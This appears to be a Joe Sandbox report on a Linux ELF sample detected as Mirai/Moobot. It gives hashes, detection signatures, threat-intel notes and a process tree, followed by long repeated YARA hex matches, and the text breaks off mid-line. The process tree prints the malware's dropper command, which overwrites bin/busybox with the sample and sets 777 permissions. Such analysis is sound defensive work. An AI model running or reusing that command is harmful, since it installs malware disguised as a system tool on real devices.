Edit tour

Linux Analysis Report
86xklcDnGU.elf

Overview

General Information

Sample name:	86xklcDnGU.elf renamed because original name is a hash value
Original sample name:	e3f4deb0a74a97e90b7ebec168ae6a9e.elf
Analysis ID:	1447655
MD5:	e3f4deb0a74a97e90b7ebec168ae6a9e
SHA1:	446d068f1ab079dc17960e1039354d019d8765a4
SHA256:	8f85c0f7e7c783069a92967a0ddc6a5557ffd1b1633aa49e10680dca208b4c44
Tags:	32elfgafgytsparc
Infos:

Detection

Mirai, Moobot

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Moobot

Contains symbols with names commonly found in malware

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample and/or dropped files contains symbols with suspicious names

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are potentially command strings

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447655
Start date and time:	2024-05-26 11:00:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	86xklcDnGU.elf renamed because original name is a hash value
Original Sample Name:	e3f4deb0a74a97e90b7ebec168ae6a9e.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/0@0/0

Warnings

Skipping network analysis since amount of network traffic is too extensive

Runtime Messages

Command:	/tmp/86xklcDnGU.elf
PID:	6223
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	done.
Standard Error:

Process Tree

system is lnxubuntu20

86xklcDnGU.elf (PID: 6223, Parent: 6143, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/86xklcDnGU.elf

86xklcDnGU.elf New Fork (PID: 6225, Parent: 6223)

sh (PID: 6225, Parent: 6223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"

sh New Fork (PID: 6227, Parent: 6225)

rm (PID: 6227, Parent: 6225, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox

sh New Fork (PID: 6228, Parent: 6225)

mkdir (PID: 6228, Parent: 6225, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin

sh New Fork (PID: 6229, Parent: 6225)

mv (PID: 6229, Parent: 6225, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/86xklcDnGU.elf bin/busybox

sh New Fork (PID: 6230, Parent: 6225)

chmod (PID: 6230, Parent: 6225, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox

86xklcDnGU.elf New Fork (PID: 6231, Parent: 6223)

86xklcDnGU.elf New Fork (PID: 6233, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6234, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6236, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6240, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6242, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6244, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6246, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6248, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6250, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6253, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6254, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6256, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6258, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6260, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6262, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6264, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6266, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6267, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6270, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6271, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6273, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6276, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6278, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6280, Parent: 6231)

86xklcDnGU.elf New Fork (PID: 6282, Parent: 6231)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
86xklcDnGU.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
86xklcDnGU.elf	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
86xklcDnGU.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
86xklcDnGU.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Memory Dumps

Source	Rule	Description	Author	Strings
6254.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6254.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6254.1.00007fc040011000.00007fc040036000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6250.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6250.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6250.1.00007fc040011000.00007fc040036000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6223.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6223.1.00007fc040011000.00007fc040036000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6223.1.00007fc040011000.00007fc040036000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: 86xklcDnGU.elf PID: 6223	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: 86xklcDnGU.elf PID: 6223	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x6230:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6244:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6258:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x626c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6280:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6294:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x62a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x62bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x62d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x62e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x62f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x630c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6320:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6334:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6348:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x635c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6370:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6384:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6398:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x63ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x63c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: 86xklcDnGU.elf PID: 6250	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: 86xklcDnGU.elf PID: 6250	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: 86xklcDnGU.elf PID: 6250	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x225:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x239:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x24d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x261:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x275:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x289:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x29d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2c5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2d9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x301:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x315:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x329:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x33d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x351:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x365:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x379:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x38d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3a1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3b5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: 86xklcDnGU.elf PID: 6254	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: 86xklcDnGU.elf PID: 6254	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: 86xklcDnGU.elf PID: 6254	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x35c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x35d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x35e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x35fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3611:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3625:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3639:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x364d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3661:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3675:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 